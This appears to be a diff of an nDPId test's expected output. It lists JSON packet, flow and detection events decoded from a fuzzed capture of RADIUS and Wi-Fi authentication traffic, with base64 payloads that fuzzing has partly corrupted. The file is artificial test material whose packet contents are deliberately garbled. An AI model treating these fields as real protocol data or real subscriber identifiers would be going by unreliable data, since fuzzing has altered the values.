00725{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":16,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":318,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":318,"pkt_l4_len":0,"thread_ts_msec":1528996636345,"pkt":"gBRP+4rqcNuYVcUnCABFAAEw9zBNAPwRXErG4hk1CgxAHgcUchABHM4XAhEBFIZVJWGtUrjkjYJ31AMheaoaCwAAV8gbBVNQQxpuAAABNxA0kHJPpbx8ay85DeRD\/YfvMwI+ldBikhmaYO0o9\/xxLxLcmQJWjN7B7B+dfQVGF8gDCMcRNLOAK5rezWH47eySAtmcrdIo8yMjeGx8MCZsAtT7L4lJowMPwZmfH007sNXtvljXq+BWATUwMzExNGUwMDczNjM4MDcyQHdsYW4ubW5jNDgwLm1jYzMxMS4zZ3BwbmV0d2+qqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqq"} 00711{"packet_event_id":1,"packet_event_name":"packet","packet_id":16,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":318,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":318,"pkt_l4_len":0,"thread_ts_msec":1528996636345,"pkt":"gBRP+4rqcNuYVcUnCABFAAEw9zBNAPwRXErG4hk1CgxAHgcUchABHM4XAhEBFIZVJWGtUrjkjYJ31AMheaoaCwAAV8gbBVNQQxpuAAABNxA0kHJPpbx8ay85DeRD\/YfvMwI+ldBikhmaYO0o9\/xxLxLcmQJWjN7B7B+dfQVGF8gDCMcRNLOAK5rezWH47eySAtmcrdIo8yMjeGx8MCZsAtT7L4lJowMPwZmfH007sNXtvljXq+BWATUwMzExNGUwMDczNjM4MDcyQHdsYW4ubW5jNDgwLm1jYzMxMS4zZ3BwbmV0d2+qqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqq"}
00231{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":16,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","l4_data_len":284,"global_ts_msec":1528996636868} 00217{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":16,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","l4_data_len":284,"global_ts_msec":1528996636868}
01195{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":17,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":671,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":671,"pkt_l4_len":0,"thread_ts_msec":1528996636345,"pkt":"AAAMB6xAABRP+4rqCABaAAKRIM5AAP8RAAAKDEAexuIZNXIQBxUCfQAABBICdf5uAQnl4Bm8CC3G2Muz0doaCgAAV8gOBFVVGgwAAFfIDQZ3aWZpGg8AAFfICQlXSVNQUjEwGQVTUEMaCQAAOCENAzQBNTAzMTElADAwNzM2MzgwNzJAd2xhbi5tbmM0ODAubWNjMzExLjNnHnBuZXR3b3JrLm9yZ34IMWNpc2NvBQYAAAAIBAasFAEQCAasFAEWIA5WWldDMlRlc3RMYWIaDAAAN2MBBgAAAAIsIDViMjJhMzFjL2YwOjc5OjYwOmQxOjdkOjM3LzIxMT0GdgAAExoxAAAACQErYXVkaXQtc2Vzc2kvbi1pZD0xMGZmMTBhYzAwMDAwMGI2MWNhMzIyNWItBgAAAAFABgAAAH5BBgAAAAZRBDU2NwJbIqMhGhQAAFfIBw5WWldDMlRlc3RMYWIa1CoAV8gIBEVUGhAAAFfICwpTdGFuZGFyZBoQAABXyAsKVGVzdCBMYWIaCQAAV8gPAzEaCgAAV8gQBE5KGhEAAFfIEQtMeW5kaHVyc3QaDAAAV8gSBgAAAMkaFwAAV8gdEVZaVyBDMiBUZXN0IExhYhoLAABXyCUFVnpXGg0AADghDgcwNzA3MRoMAAA4IREGAAAAABoVAAA4IRIPSW52YWxpdCBWYWx9ZRodAAA4IRMXNDAuODA0RDgyTi03NC4xMDI4MzlXGgwAADghFAYAAAECGgwAADghFQYAAAACGhUAADghFg9TdGFkaXVtRGlyZWN0KAYAAAABHxNmMC03OS02MC1kMS03ZC0zNx4lMIAtYTctNDItZDAtZTAtMDA6VmVyaXpvbldpRmlBY2Nlc3MaDAAABYMHBsBQSpk="} 01181{"packet_event_id":1,"packet_event_name":"packet","packet_id":17,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":671,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":671,"pkt_l4_len":0,"thread_ts_msec":1528996636345,"pkt":"AAAMB6xAABRP+4rqCABaAAKRIM5AAP8RAAAKDEAexuIZNXIQBxUCfQAABBICdf5uAQnl4Bm8CC3G2Muz0doaCgAAV8gOBFVVGgwAAFfIDQZ3aWZpGg8AAFfICQlXSVNQUjEwGQVTUEMaCQAAOCENAzQBNTAzMTElADAwNzM2MzgwNzJAd2xhbi5tbmM0ODAubWNjMzExLjNnHnBuZXR3b3JrLm9yZ34IMWNpc2NvBQYAAAAIBAasFAEQCAasFAEWIA5WWldDMlRlc3RMYWIaDAAAN2MBBgAAAAIsIDViMjJhMzFjL2YwOjc5OjYwOmQxOjdkOjM3LzIxMT0GdgAAExoxAAAACQErYXVkaXQtc2Vzc2kvbi1pZD0xMGZmMTBhYzAwMDAwMGI2MWNhMzIyNWItBgAAAAFABgAAAH5BBgAAAAZRBDU2NwJbIqMhGhQAAFfIBw5WWldDMlRlc3RMYWIa1CoAV8gIBEVUGhAAAFfICwpTdGFuZGFyZBoQAABXyAsKVGVzdCBMYWIaCQAAV8gPAzEaCgAAV8gQBE5KGhEAAFfIEQtMeW5kaHVyc3QaDAAAV8gSBgAAAMkaFwAAV8gdEVZaVyBDMiBUZXN0IExhYhoLAABXyCUFVnpXGg0AADghDgcwNzA3MRoMAAA4IREGAAAAABoVAAA4IRIPSW52YWxpdCBWYWx9ZRodAAA4IRMXNDAuODA0RDgyTi03NC4xMDI4MzlXGgwAADghFAYAAAECGgwAADghFQYAAAACGhUAADghFg9TdGFkaXVtRGlyZWN0KAYAAAABHxNmMC03OS02MC1kMS03ZC0zNx4lMIAtYTctNDItZDAtZTAtMDA6VmVyaXpvbldpRmlBY2Nlc3MaDAAABYMHBsBQSpk="}
00210{"basic_event_id":2,"basic_event_name":"Unknown L3 protocol","datalink":1,"thread_id":0,"packet_id":17,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","protocol":2048,"global_ts_msec":1528996641474} 00196{"basic_event_id":2,"basic_event_name":"Unknown L3 protocol","datalink":1,"packet_id":17,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","protocol":2048,"global_ts_msec":1528996641474}
00594{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":18,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528996641548,"flow_last_seen":1528996641548,"flow_idle_time":180000,"flow_min_l4_payload_len":89,"flow_max_l4_payload_len":89,"flow_tot_l4_payload_len":89,"flow_avg_l4_payload_len":89,"midstream":0,"thread_ts_msec":1528996641548,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.64.30","src_port":30764,"dst_port":12344,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00594{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":18,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528996641548,"flow_last_seen":1528996641548,"flow_idle_time":180000,"flow_min_l4_payload_len":89,"flow_max_l4_payload_len":89,"flow_tot_l4_payload_len":89,"flow_avg_l4_payload_len":89,"midstream":0,"thread_ts_msec":1528996641548,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.64.30","src_port":30764,"dst_port":12344,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
00589{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":18,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1528996641548,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":147,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":50,"pkt_len":147,"pkt_l4_len":97,"thread_ts_msec":1528996641548,"pkt":"ABRP+4rqcNuYVcUnCABJAACFyrZAAPsRim\/G4hk1CgxAHgcVchAAcXfuBRIAaavjNmx4LDA40fVoWG4z4qoBNTAzMTE0ODAwNjM2MzgwNzJAd2xhbi5tbmM0ODAubWNjMzExLjNncHBsZXR3b3JrLm9yZywgNWIyMmEzMWMvZjA6Nzk6NjA6ZDE6N2RZMzcvMjEx"} 00589{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":18,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1528996641548,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":147,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":50,"pkt_len":147,"pkt_l4_len":97,"thread_ts_msec":1528996641548,"pkt":"ABRP+4rqcNuYVcUnCABJAACFyrZAAPsRim\/G4hk1CgxAHgcVchAAcXfuBRIAaavjNmx4LDA40fVoWG4z4qoBNTAzMTE0ODAwNjM2MzgwNzJAd2xhbi5tbmM0ODAubWNjMzExLjNncHBsZXR3b3JrLm9yZywgNWIyMmEzMWMvZjA6Nzk6NjA6ZDE6N2RZMzcvMjEx"}
00486{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":19,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","packets-captured":19,"packets-processed":12,"total-skipped-flows":0,"total-l4-data-len":4794,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":4,"total-detection-updates":0,"total-updates":1,"current-active-flows":4,"total-active-flows":6,"total-idle-flows":2,"total-events-serialized":38,"global_ts_msec":1528996680540} 00486{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":19,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","packets-captured":19,"packets-processed":12,"total-skipped-flows":0,"total-l4-data-len":4794,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":4,"total-detection-updates":0,"total-updates":1,"current-active-flows":4,"total-active-flows":6,"total-idle-flows":2,"total-events-serialized":38,"global_ts_msec":1528996680540}
@@ -44,14 +44,14 @@
00597{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":28,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528996689402,"flow_last_seen":1528996689402,"flow_idle_time":180000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":0,"thread_ts_msec":1528996689402,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.64.30","src_port":1812,"dst_port":29270,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00597{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":28,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528996689402,"flow_last_seen":1528996689402,"flow_idle_time":180000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":0,"thread_ts_msec":1528996689402,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.64.30","src_port":1812,"dst_port":29270,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
00634{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":28,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1528996689402,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":179,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":179,"pkt_l4_len":145,"thread_ts_msec":1528996689402,"pkt":"ABRP+4rqcNuYVcUnCABFAAClbuVAAPwRXCDG4hk1CgxAHgcUclYAkWdmCxcAiQrIitkB1LgR0s5zEPVzzzIBNTAzMTE0dzAyNzg1MDEwMDlAd2xhbi5tbmM0ODAubWNjMzExLjNncHBuZXR3b3JrLm9yZywgNWIyMmEzNDgvNjQ6YjA6YTY6MGU6YTQ6ZWMvMjEyTw4BAAAMFwwAAHYBf\/xQEjLibctMfYgZSgHqxKHsV1U="} 00634{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":28,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1528996689402,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":179,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":179,"pkt_l4_len":145,"thread_ts_msec":1528996689402,"pkt":"ABRP+4rqcNuYVcUnCABFAAClbuVAAPwRXCDG4hk1CgxAHgcUclYAkWdmCxcAiQrIitkB1LgR0s5zEPVzzzIBNTAzMTE0dzAyNzg1MDEwMDlAd2xhbi5tbmM0ODAubWNjMzExLjNncHBuZXR3b3JrLm9yZywgNWIyMmEzNDgvNjQ6YjA6YTY6MGU6YTQ6ZWMvMjEyTw4BAAAMFwwAAHYBf\/xQEjLibctMfYgZSgHqxKHsV1U="}
00658{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":28,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528996689402,"flow_last_seen":1528996689402,"flow_idle_time":180000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":0,"thread_ts_msec":1528996689402,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.64.30","src_port":1812,"dst_port":29270,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} 00658{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":28,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528996689402,"flow_last_seen":1528996689402,"flow_idle_time":180000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":0,"thread_ts_msec":1528996689402,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.64.30","src_port":1812,"dst_port":29270,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}}
00575{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":30,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":206,"pkt_l4_len":0,"thread_ts_msec":1528996689524,"pkt":"ABRP+4rqcNuYVcUnCABFAADA9+klAPwRXAHG4hk1CgxAHgcUchAArPtqAxgApNkk5fehx32PqouJEXUDfwgBNTAzMTE0ODAyNzg1MDEwMDlAd2xhbi5tbmM0ODAubWNjMzExLjNncHBuZXR3b3JrLm9yZywgNWIyMmEzNDkvNjQ6YjA6YU06uGU6YTQ6ZWMvMjEyeCIzMjc2NCBTdWJzY3JpYmVyIG5vdCBwcm92aXNpb25lZE8lAAEABwBQEslNLvLV5rc9WbdNXraRxZQ="} 00561{"packet_event_id":1,"packet_event_name":"packet","packet_id":30,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":206,"pkt_l4_len":0,"thread_ts_msec":1528996689524,"pkt":"ABRP+4rqcNuYVcUnCABFAADA9+klAPwRXAHG4hk1CgxAHgcUchAArPtqAxgApNkk5fehx32PqouJEXUDfwgBNTAzMTE0ODAyNzg1MDEwMDlAd2xhbi5tbmM0ODAubWNjMzExLjNncHBuZXR3b3JrLm9yZywgNWIyMmEzNDkvNjQ6YjA6YU06uGU6YTQ6ZWMvMjEyeCIzMjc2NCBTdWJzY3JpYmVyIG5vdCBwcm92aXNpb25lZE8lAAEABwBQEslNLvLV5rc9WbdNXraRxZQ="}
00231{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":30,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","l4_data_len":172,"global_ts_msec":1528996689587} 00217{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":30,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","l4_data_len":172,"global_ts_msec":1528996689587}
00597{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":32,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528996733156,"flow_last_seen":1528996733156,"flow_idle_time":180000,"flow_min_l4_payload_len":109,"flow_max_l4_payload_len":109,"flow_tot_l4_payload_len":109,"flow_avg_l4_payload_len":109,"midstream":0,"thread_ts_msec":1528996733156,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.64.30","src_port":309,"dst_port":12339,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00597{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":32,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528996733156,"flow_last_seen":1528996733156,"flow_idle_time":180000,"flow_min_l4_payload_len":109,"flow_max_l4_payload_len":109,"flow_tot_l4_payload_len":109,"flow_avg_l4_payload_len":109,"midstream":0,"thread_ts_msec":1528996733156,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.64.30","src_port":309,"dst_port":12339,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
00637{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":32,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":1,"flow_last_seen":1528996733156,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":179,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":62,"pkt_len":179,"pkt_l4_len":117,"thread_ts_msec":1528996733156,"pkt":"ABRP+4rqcNuYVcUnCABMBACl+GRAAPwRW6HG4hk1CgxAHgcUchAAkfvBCxkAidYnQnH6\/q3z6sD9\/UzPvYgBNTAzMTE0ODAwNzEzOTQzMDRAd2xhbi5tbmM0ODAubWNjMzExLjNncHBuZXR3b3JrLm9yZywgNWIyMmEzN2MvYjA6OWY6YmE6NGE6MGU6N2UvMjEzTw4BAAAxFwwAAAwBf\/xQEj4NW9JYKjnp+Qug4VR6j6U="} 00637{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":32,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":1,"flow_last_seen":1528996733156,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":179,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":62,"pkt_len":179,"pkt_l4_len":117,"thread_ts_msec":1528996733156,"pkt":"ABRP+4rqcNuYVcUnCABMBACl+GRAAPwRW6HG4hk1CgxAHgcUchAAkfvBCxkAidYnQnH6\/q3z6sD9\/UzPvYgBNTAzMTE0ODAwNzEzOTQzMDRAd2xhbi5tbmM0ODAubWNjMzExLjNncHBuZXR3b3JrLm9yZywgNWIyMmEzN2MvYjA6OWY6YmE6NGE6MGU6N2UvMjEzTw4BAAAxFwwAAAwBf\/xQEj4NW9JYKjnp+Qug4VR6j6U="}
01295{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":35,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":745,"pkt_type":2050,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":745,"pkt_l4_len":0,"thread_ts_msec":1528996733357,"pkt":"AAAMB6xAABRP+4rqCAJFAALbINdAAP8RAAAKDEAexuIZNXIQBxQCxwAAARsCv2gdiE+D2K4zEaVWxj6b5vAaCgAAV8gOBFVTGgwAAFfIDQZ3aWZpGg8AAFfICQlXSVNQUjEwGgkAADghDQMzNwZbIqOAATUwMzExNDgwMDcxMzk0MzA0QHdsYW4ubW5jNDgwLm1jYzMxMS4zZ3BwbmV0d29yay5vcmdZAxB+CDFjaXNjb4MGAAAAAR8TYjAtOWYtYmEtNGEtMGUtN2UeJTAwLWE3LTQyLWQwLWUwLTAwOlZlcml4b25XaUZpQWNjZXNzBQYAAAAIGjEAAAAJASthdWRpVi1zZXNzaW9uLWlkPTEwZmYxMGFjMDAwMDAwYjg3ZGEzMjI1Yiw0NWIyMmEzN2MvYjA6OWY6YmE6NGE6MGU6N2UvMjEzBAasFAEQIA5WWldDMlRlc3QBYWIaDAAAN2MBBgAAAAIGJQAAAAIMBgAABRQ9BgAAABNABgAAAA1BBgAAAAZRBDU2TzoCAQBCATAzMTE0ODAwNzEzOTQzMDRAd2xhbi5tbmM0ODAubWNjMzExLjNncHBuZXR3b3JrLm9yZxoUAABXyAcOVlpXQzJUZXN0TGFiGgoAAFfICARFVBoQAABXyAoKU3RhbmRhcmQaEAAAV8gLClRlc3QgTGFiGgkAAFfIDwMxGm0AAFfIEAROShoRAABXyBELTHluZGh1cnN0GgwAAFfIEgYAAADJGhcAAFfIHRFWWlcgQzIgVGXGdCBMYWIaCwAAV8glBVZ6Vxp3AAA4IQ4HMDcwNzEaDAAAOCERBgAAAAAaFQAAOCESD0ludmFsaWQgVmFsdWUaHQAAOCETFzQwLjgwNDg4Mk4tNzQuMTAyODM5eBoMAAA4IRQGAAABAhoMAAA4IRUGAAAAAhoVAAA4IRYPU3RhZGl1bURpcmVjdBoMAAAFgwcGwFBKmVASdNdxL4DyCHN8UpXdyQsAbg=="} 01281{"packet_event_id":1,"packet_event_name":"packet","packet_id":35,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":745,"pkt_type":2050,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":745,"pkt_l4_len":0,"thread_ts_msec":1528996733357,"pkt":"AAAMB6xAABRP+4rqCAJFAALbINdAAP8RAAAKDEAexuIZNXIQBxQCxwAAARsCv2gdiE+D2K4zEaVWxj6b5vAaCgAAV8gOBFVTGgwAAFfIDQZ3aWZpGg8AAFfICQlXSVNQUjEwGgkAADghDQMzNwZbIqOAATUwMzExNDgwMDcxMzk0MzA0QHdsYW4ubW5jNDgwLm1jYzMxMS4zZ3BwbmV0d29yay5vcmdZAxB+CDFjaXNjb4MGAAAAAR8TYjAtOWYtYmEtNGEtMGUtN2UeJTAwLWE3LTQyLWQwLWUwLTAwOlZlcml4b25XaUZpQWNjZXNzBQYAAAAIGjEAAAAJASthdWRpVi1zZXNzaW9uLWlkPTEwZmYxMGFjMDAwMDAwYjg3ZGEzMjI1Yiw0NWIyMmEzN2MvYjA6OWY6YmE6NGE6MGU6N2UvMjEzBAasFAEQIA5WWldDMlRlc3QBYWIaDAAAN2MBBgAAAAIGJQAAAAIMBgAABRQ9BgAAABNABgAAAA1BBgAAAAZRBDU2TzoCAQBCATAzMTE0ODAwNzEzOTQzMDRAd2xhbi5tbmM0ODAubWNjMzExLjNncHBuZXR3b3JrLm9yZxoUAABXyAcOVlpXQzJUZXN0TGFiGgoAAFfICARFVBoQAABXyAoKU3RhbmRhcmQaEAAAV8gLClRlc3QgTGFiGgkAAFfIDwMxGm0AAFfIEAROShoRAABXyBELTHluZGh1cnN0GgwAAFfIEgYAAADJGhcAAFfIHRFWWlcgQzIgVGXGdCBMYWIaCwAAV8glBVZ6Vxp3AAA4IQ4HMDcwNzEaDAAAOCERBgAAAAAaFQAAOCESD0ludmFsaWQgVmFsdWUaHQAAOCETFzQwLjgwNDg4Mk4tNzQuMTAyODM5eBoMAAA4IRQGAAABAhoMAAA4IRUGAAAAAhoVAAA4IRYPU3RhZGl1bURpcmVjdBoMAAAFgwcGwFBKmVASdNdxL4DyCHN8UpXdyQsAbg=="}
00212{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":35,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","layer_type":2050,"global_ts_msec":1528996736535} 00198{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":35,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","layer_type":2050,"global_ts_msec":1528996736535}
00576{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":38,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":206,"pkt_l4_len":0,"thread_ts_msec":1528996736731,"pkt":"ABRP+4rqcNuYVcUnCABFAADA+HNBAPwRW3fG4hk1CgxAHgcUchAArIw9AxwApBZ8i1l5y5I6R7UN7fbGLQ0BNTAzMTE0ODAwNzEzOTQzMDRAd2xhbi5tbmM0ODAubWNjMzExLhNncHBuZXR3b3JrLm9yZywgNWIyMmEzN2PpYjA6OWY6YmE6NGE6MGU6N2UvMjEzEiIzMjc2NCBTdWJzY3JpYmVyJWlvdCBwcm92aXNpb25lZE8HBAEABwBQEhu6bMXdvKMo\/pphwZK5oRM="} 00562{"packet_event_id":1,"packet_event_name":"packet","packet_id":38,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":206,"pkt_l4_len":0,"thread_ts_msec":1528996736731,"pkt":"ABRP+4rqcNuYVcUnCABFAADA+HNBAPwRW3fG4hk1CgxAHgcUchAArIw9AxwApBZ8i1l5y5I6R7UN7fbGLQ0BNTAzMTE0ODAwNzEzOTQzMDRAd2xhbi5tbmM0ODAubWNjMzExLhNncHBuZXR3b3JrLm9yZywgNWIyMmEzN2PpYjA6OWY6YmE6NGE6MGU6N2UvMjEzEiIzMjc2NCBTdWJzY3JpYmVyJWlvdCBwcm92aXNpb25lZE8HBAEABwBQEhu6bMXdvKMo\/pphwZK5oRM="}
00231{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":38,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","l4_data_len":172,"global_ts_msec":1528996736804} 00217{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":38,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","l4_data_len":172,"global_ts_msec":1528996736804}
00613{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":43,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528996521324,"flow_last_seen":1528996521324,"flow_idle_time":180000,"flow_min_l4_payload_len":683,"flow_max_l4_payload_len":683,"flow_tot_l4_payload_len":683,"flow_avg_l4_payload_len":683,"midstream":0,"thread_ts_msec":1528996740339,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.53","src_port":29200,"dst_port":1796,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00613{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":43,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528996521324,"flow_last_seen":1528996521324,"flow_idle_time":180000,"flow_min_l4_payload_len":683,"flow_max_l4_payload_len":683,"flow_tot_l4_payload_len":683,"flow_avg_l4_payload_len":683,"midstream":0,"thread_ts_msec":1528996740339,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.25.53","src_port":29200,"dst_port":1796,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
